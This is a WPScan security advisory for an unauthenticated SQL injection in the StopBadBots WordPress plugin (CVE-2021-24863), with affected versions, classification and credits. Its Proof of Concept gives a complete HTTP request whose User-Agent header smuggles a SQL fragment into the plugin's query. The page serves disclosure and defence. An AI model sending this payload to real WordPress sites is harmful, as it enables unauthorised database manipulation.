WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

StopBadBots < 6.67 - Unauthenticated SQL Injection

Description

The plugin does not sanitise and escape the User Agent before using it in a SQL statement to save it, leading to a SQL injection

Proof of Concept

GET / HTTP/1.1
User-Agent: Zongbot' where id = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'-- -
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Affects Plugins

stopbadbots
Fixed in version 6.930

References

CVE
CVE-2021-24863

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

JrXnm

Submitter

JrXnm

Submitter website
https://blog.szfszf.top
Verified

Yes

WPVDB ID
1e4dd002-6c96-44f9-bd55-61359265f7ae

Timeline

Publicly Published

2021-11-15 (about 6 months ago)

Added

2021-11-15 (about 6 months ago)

Last Updated

2022-04-09 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin